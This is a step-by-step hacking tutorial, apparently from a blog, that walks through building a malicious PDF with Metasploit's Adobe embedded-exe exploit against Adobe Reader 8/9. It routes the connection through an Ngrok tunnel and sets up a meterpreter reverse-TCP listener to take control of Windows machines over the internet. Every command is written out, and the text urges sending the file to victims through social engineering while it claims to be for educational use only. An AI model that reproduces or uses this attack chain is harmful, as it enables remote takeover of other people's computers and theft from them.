How to Hack Windows OS with Adobe PDF Exploit

In this tutorial, we will be learning how to hack windows 10 using adobe PDF exploit over the internet. We will use the Ngrok tool for Port Forwarding which is available for Linux, Windows, and macOS. Ngrok can help us perform this hack over the internet and attack outside our local area network. If You want to use this hack on the same network i.e on LAN  then replace the LHOST and LPORT (Step 6 & 7) with Your own Local IP Address on the network. You can find the local IP using the ifconfig command.

Disclaimer:

Please be aware that hacking any device is illegal unless you have permission from the owner and the parties involved. This post should be used as a tool to help people understand how hackers are hacking windows 10 devices with malicious pdf files. The Hacking world team shall not be held responsible if any criminal charges are brought against any person who misuses the information on this website to violate the law.

Requirements:

• Kali Linux installed
• Ngrok installed
• Target should have adobe reader version 8 or adobe reader version 9

Steps for hacking windows:

1.Creating a Malicious PDF file using Metasploit

2. Port Forwarding using Ngrok so that hack can happen over the internet
3. Start a Listener for our Malicious Payload using Msfconsole

Steps to create a Malicious Payload using Metasploit Framework 

Step 1: Open a Kali Linux terminal and type the following command to start Metasploit

msfconsole

Step 2: There are numerous windows exploits. For this tutorial, we will be using the adobe pdf exploit. You can use any windows exploit, but for the sake of convenience, we will be using the following adobe pdf exploit.

Type the following command to use the adobe pdf exploit

use exploit/windows/fileformat/adobe_pdf_embedded_exe

Step 3: Now that we have selected the exploit we need to specify the Payload to be Injected in the malicious Adobe PDF file. To do this type the following command:

set payload windows/meterpreter/reverse_tcp

This will create a Reverse TCP connection from the victim to the attacker Machine (Your machine)

Port forwarding with ngrok

Step 4: Now we need to start the Ngrok service so that we can use the port forwarding on our machine. To launch the ngrok service, type the following command:

./ngrok tcp 1234

Step 5: Once, You have started the Ngrok service you will see the following:

The address before the colon(:) is Your LHOST and after the colon is LPORT: Refer to the image below:

 Note: Your LHOST and LPORT will be different from mine. Replace these with your LHOST and LPORT.

Step 6: Now to set up your LHOST, type the following command:

set LHOST 0.tcp.ngrok.io

Step 7: Now to set up LPORT type the following command:

set LPORT 13288

Step 8: Now set the name of the file by this command

set FILENAME test.pdf

Step 9: Now type exploits to run the exploit and create a malicious pdf file:

exploit

Metasploit has now created an adobe PDF file named test.pdf that contains the Meterpeter listener pointing towards your machine. Metasploit will by default place the file at /root/.msf4/local/test.pdf. Check this directory for the malicious pdf. Now you need to send this pdf by using social engineering tricks to the Victim so that the victim downloads and runs the malicious PDF file.

Creating a Listener for our Malicious PDF Payload

To create a listener for our malicious adobe pdf exploit, we need to type the following commands in order:

Step 1: Open Metasploit in a new kali Linux terminal:

msfconsole

Step 2: Now execute the following commands one by one in the same order as shown below:

use multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 127.0.0.1

set LPORT 1234

exploit

So now as soon as the victim opens the malicious PDF file, a meterpreter connection will be established between the target and your attacker machine via the Metasploit listener. Once you get a reverse shell you can perform all the other hacks. Just type help to see the list of hacks that are possible.

Congratulations you have successfully hacked windows with a malicious pdf file.

Commonly asked questions about hacking windows with an Adobe PDF exploit:

Q.1 I want to use my own pdf file and embed a virus in it. How do I do that?

The default file used is saved in the following directory:

/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf

You can change this file by using the INFILENAME command. This command basically specifies the input file. So if you save your own pdf file on the desktop. You can use the following command to use your own pdf. Make sure the pdf is editable. Password-protected pdfs will not work.

Use this command after step 6:

INFILENAME Desktop/mypdf.pdf

Now the virus will be made by using my pdf file which is just a random name I made.

Q2 Is hacking windows 10 devices legal?

No, hacking windows 10 is not legal. This post is an educational post to show how hackers can hack windows with a pdf file using the adobe reader exploit.

Q3 The Malicious pdf file I made is detected as a virus by antivirus. What do I do?

Do not worry; you are safe. The alert is because you made your own virus, which is hidden in the pdf file. The antivirus software might detect the virus. Which only means you have great antivirus software.

Q4. How can I hack my friend’s or girlfriend’s pc with this hack?

This hack is only for educational purposes, not for hacking people. We do not support any illegal hacking. Kindly refrain from such comments and requests.

Q5. Does this hack work on all versions of Adobe Reader?

No, it does not work on all versions of the adobe reader only on versions lower than version 10; however, un-updated adobe readers can be used for this windows 10 exploit. An antivirus will definitely detect it as a virus. You need to make sure the target machine has adobe reader version 8 or version 9. This bug was fixed later in version 10.